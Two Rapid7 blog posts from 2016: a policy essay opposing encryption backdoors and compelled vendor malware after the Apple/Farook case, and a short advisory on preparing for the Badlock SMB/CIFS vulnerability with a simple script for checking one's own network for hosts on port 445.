Encryption is a fundamental means of protecting data from unauthorized access or use. Commerce, government, and individual internet users depend on strong security for our communications. For example, encryption helps prevent unauthorized parties from reading sensitive communications – like banking or health information – traveling over the internet. Another example: encryption underpins certificates that demonstrate authenticity (am I who I say I am?), so that we can have high confidence that a digital communication – such as a computer software security update – is coming from the right source and not a man-in-the-middle attacker. The growing adoption of encryption for features like these has made users much safer than we would be without it. Rapid7 believes companies and technology innovators should be able to use the encryption protocols that best protect their customers and fit their service model – whether that protocol is end-to-end encryption or some other system.

 

However, we also recognize that this increased data security creates a security trade-off. Law enforcement will at times encounter encryption that it cannot break by brute force and for which only the user – not the software vendor – has the key, and this will hinder lawful searches. The FBI's recently concluded effort to access the cell phone belonging to deceased terrorist Syed Farook of San Bernardino, California, was a case study in this very issue. Although the prevalence of systems currently secured with end-to-end encryption and no other means of access should not be overstated, law enforcement search attempts may be thwarted more often as communications evolve to use unbreakable encryption with greater frequency. This prospect has tempted government agencies to seek novel ways around encryption. While we do not find fault with law enforcement agencies attempting to execute valid search or surveillance orders, several of the options under debate for circumventing encryption pose broad negative implications for cybersecurity.

 

Weakening encryption

 

One option under discussion is a legal requirement that companies weaken encryption by creating a means of "exceptional access" to software and communications services that government agencies can use to unlock encrypted data. This option could take two forms – one in which the government agencies hold the decryption keys (unmediated access), and one in which the software creator or another third party holds the decryption keys (mediated access). Both models would impose significant security risks for the underlying software or service by creating attack surfaces for bad actors, including cybercriminals and unfriendly international governments. For this reason, Rapid7 does not support a legal requirement for companies or developers to undermine encryption for facilitating government access to encrypted data.

 

The huge diversity of modern communications platforms and software architecture makes it impossible to implement a one-size-fits-all backdoor into encryption. Instead, to comply with a hypothetical mandate to weaken encryption, different companies are likely to build different types of exceptional access. Some encryption backdoors will be inherently more or less secure than others due to technical considerations, the availability of company resources to defend the backdoor against insider and external threats, the attractiveness of client data to bad actors, and other factors. The resulting environment would most likely be highly complex, vulnerable to misuse, and burdensome to businesses and innovators.

 

Rapid7 also shares concerns that requiring US companies to provide exceptional access to encrypted communications for US government agencies would lead to sustained pressure from many jurisdictions – both local and worldwide – for similar access. Companies or oversight bodies may face significant challenges in accurately tracking when, by whom, and under what circumstances client data is accessed – especially if governments have unmediated access to decryption keys. If US products are designed to be inherently insecure and "surveillance-ready," then US companies will face a considerable competitive disadvantage in international markets where more secure products are available.

 

Legal mandates to weaken encryption are unlikely to keep unbreakable encryption out of the hands of well-resourced criminals and terrorists. Open source software is commonly "forked," and it should be expected that developers will modify open source software to remove an encryption backdoor. Jurisdictions without an exceptional access requirement could still distribute closed source software with unbreakable encryption. As a result, the cybersecurity risks of weakened encryption are especially likely to fall on users who are not already security-conscious enough to seek out these workarounds.

 

Intentionally weakening encryption or other technical protections ultimately undermines the security of the end users, businesses, and governments. That said, if companies or software creators voluntarily choose to build exceptional access mechanisms into their encryption, Rapid7 believes it is their right to do so. However, we would not recommend doing so, and we believe companies and creators should be as transparent as possible with their users about any such feature.

 

"Technical assistance" – compelled malware

 

Another option under debate is whether the government can force developers to build custom software that removes security features of the developers' products. This prospect arose in connection with the FBI's now-concluded bid to unlock Farook's encrypted iPhone to retrieve evidence for its terrorism investigation. In that case, a magistrate judge ordered Apple to develop and sign a custom build of iOS that would disable several security features preventing the FBI from using electronic means to quickly crack the phone's passcode via brute force. This custom version of iOS would have been deployed like a firmware update only to the deceased terrorist's iPhone, and Apple would have maintained control of both the iPhone and the custom iOS. However, the FBI ultimately cracked the iPhone without Apple's assistance – with help, according to some reports, from a third party company – and asked the court to vacate its order against Apple. Still, it's possible that law enforcement agencies could again attempt to legally compel companies to hack their own products in the future.

 

In the Farook case, the government had good reason to examine the contents of the iPhone, and clearly took steps to help prevent the custom software from escaping into the wild. This was not a backdoor or exceptional access to encryption as traditionally conceived, and not entirely dissimilar to cooperation Apple has offered law enforcement in the past for unencrypted older versions of iOS. Nonetheless, the legal precedent that would be set if a court compels a company or developer to create malware to weaken its own software could have broad implications that are harmful to cybersecurity.

 

FBI Director James Comey confirmed in testimony before Congress that if the government succeeded in court against Apple, law enforcement agencies would likely use the precedent as justification to demand companies create custom software in the future. It's possible the precedent could be applied to a prolonged wiretap of users of an encrypted messaging service like WhatsApp, or a range of other circumstances. Establishing the limits of this authority would be quite important.

 

If the government consistently compelled companies to create custom software to undermine the security of their own products, the effect could be proliferation of company-created malware. Companies would need to defend their malware from misuse by both insiders and external threats while potentially deploying the malware to comply with many government demands worldwide, which – like defending an encryption backdoor – would be considerably burdensome on companies. This outcome could reduce user trust in the security of vendor-issued software updates, even though it is generally critical for cybersecurity for users to keep their software as up to date as possible. Companies may also design their products to be less secure from the outset, in anticipation of future legal orders to circumvent their own security.

 

These scenarios raise difficult questions for cybersecurity researchers and firms like Rapid7. Government search and surveillance demands are frequently paired with gag orders that forbid the recipient (such as the individual user or a third party service provider) from discussing the demands. Could this practice impact public disclosure or company acknowledgment of a vulnerability when researchers discover a security flaw or threat signature originating from software a company is compelled to create for law enforcement? When would a company be free to fix its government-ordered vulnerability? Would cybersecurity firms be able to wholeheartedly recommend clients accept vendor software updates?

 

Rapid7 does not support legal requirements – whether via legislation or court order – compelling companies to create custom software to degrade security. Creating secure software is very difficult under the best of circumstances, and forcing companies to actively undermine their own security features would undo decades of security learning and practice. If the government were to compel companies to provide access to their products, Rapid7 believes it would be preferable to use tools already available to the companies (such as that which Apple offered prior to iOS 8) in limited circumstances that do not put non-targeted users at risk. If a company has no means to crack its products already available, the government should not compel it to create custom software that undermines its products' security features. Software developers should also be free to develop patches or introduce more secure versions of their products to fix vulnerabilities at any time.

 

Government hacking and forensics

 

Finally, there is the option of government deploying its own tools to hack products and services to obtain information. End-to-end encryption provides limited protection when one of the endpoints is compromised. If government agencies do not compel companies to weaken their own products, they could exploit existing vulnerabilities themselves. As noted above, the government's exploitation of existing vulnerabilities was the outcome of the FBI's effort to compel Apple to provide access to Farook's iPhone. Government has also turned to hacking or implanting malware in other contexts well before the Farook case.

 

In many ways, this activity is to be expected. It is not an irrational priority for law enforcement agencies to modernize their computer penetration capabilities to be commensurate with savvy adversaries. A higher level of hacking and digital forensic expertise for law enforcement agencies should improve their ability to combat cybercriminals more generally. However, this approach raises its own set of important questions related to transparency and due process.

 

Upgrading the technological expertise of law enforcement agencies will take time, education, and resources. It will also require thoughtful policy discussions on what the appropriate rules for government hacking should be – there are few clear and publicly available standards for government use of malware. One potentially negative outcome would be government stockpiling of zero-day vulnerabilities for use in investigations, without disclosing the vulnerabilities to vendors or the public. The picture is clouded further when the government partners with third-party organizations to hack on its behalf, as may have occurred in the case of Farook's iPhone – if the third party owns a software exploit, could IP or licensing agreements prevent the government from disclosing the vulnerability to the vendor? White House Cybersecurity Coordinator Michael Daniel noted there were "few hard and fast rules" for disclosing vulnerabilities, but pointed out that zero-day stockpiles put internet users at risk and would not be in the interests of national security. We agree and appreciate the default of vulnerability disclosure, but clearer rules on transparency and due process in the context of government hacking are becoming increasingly important.

 

No easy answers

 

We view the complex issue of encryption and law enforcement access as security versus security. To us, the best path forward is the one that provides the best security for the greatest number of people. To that end, Rapid7 believes we should embrace the use of strong encryption without compelling companies to create software that undermines their products' security features. We want the government to help prevent crime by working with the private sector to make communications services, commercial products, and critical infrastructure trustworthy and resilient. That foundation of greater cybersecurity will benefit us all in the future.

 

 

Harley Geiger

Director of Public Policy, Rapid7


Getting Ahead of Badlock

Posted by todb, Mar 30, 2016

badlock-tay-selly.jpg

While we are keeping abreast of the news about the foretold Badlock vulnerability, we don't know much more than anyone else right now. We currently speculate that the issue lies in the fundamentals of the SMB/CIFS protocol, since the vulnerability is reported to be present in both Microsoft's and Samba's implementations. Beyond that, we're expecting the details from Microsoft as part of their regularly scheduled Patch Tuesday.

 

How Bad Is It?

Microsoft and the Samba project both clearly believe this is a more critical than usual problem, but in the end, it's almost certainly limited to SMB/CIFS, much as MS08-067 was. This comparison should be alternately comforting and troubling. While the SMB world isn't the same as it was in late 2008, MS08-067 remains a solid, bread-and-butter vulnerability exploited by internal penetration testers. We are very concerned about the population of chronically unpatched SMB/CIFS servers that lurk in the dusty corners of nearly every major IT enterprise.

 

What Can I Do Now?

Any large organization with a significant install base of Windows servers should spend this time clearing patch and reboot schedules for production SMB/CIFS servers using their usual Patch Tuesday change control processes. Assuming the bug is even remotely as bad as the discoverers are making it out to be, this is a patch you want to push to production about as fast as your change control processes allow. Given the high visibility of this particular issue, it would be wise to treat it as a mostly predictable emergency.

 

If you feel like you're already set up for rapid patch deployment, this is also a pretty great time to conduct an assessment of both your intentional and accidental SMB/CIFS footprint. While Windows machines today ship with an operating-system-level firewall enabled by default, all too often users will "temporarily" disable these protections in order to get some specific file-sharing task done, and there's really nothing more permanent in an IT environment than a temporary workaround.
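
As a starting point for that footprint assessment, here is a minimal Python sketch that walks a subnet and reports anything answering on the SMB port. The subnet below is a placeholder of ours, and a real inventory should also cover TCP 139 and lean on a dedicated scanner:

#!/usr/bin/env python3
# Quick-and-dirty SMB/CIFS footprint check: report hosts listening on
# TCP 445 across a subnet. Standard library only.
import ipaddress
import socket

SUBNET = "192.168.1.0/24"  # placeholder: substitute your own ranges

for host in ipaddress.ip_network(SUBNET).hosts():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(0.5)
        # connect_ex returns 0 when the TCP handshake succeeds.
        if s.connect_ex((str(host), 445)) == 0:
            print(f"{host} is listening on 445/tcp")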

 

In short, our advice is to take advantage of the hype around this bug and buy some time from your management to get some legwork done in advance of next Patch Tuesday. You might be surprised by what you find, but it's better to discover those rogue SMB/CIFS endpoints now, in a measured way, than during a panic-fueled crisis. And if you haven't exercised your emergency patch procedures in a while, well, now you have every excuse you could ask for, short of an actual, unplanned emergency.
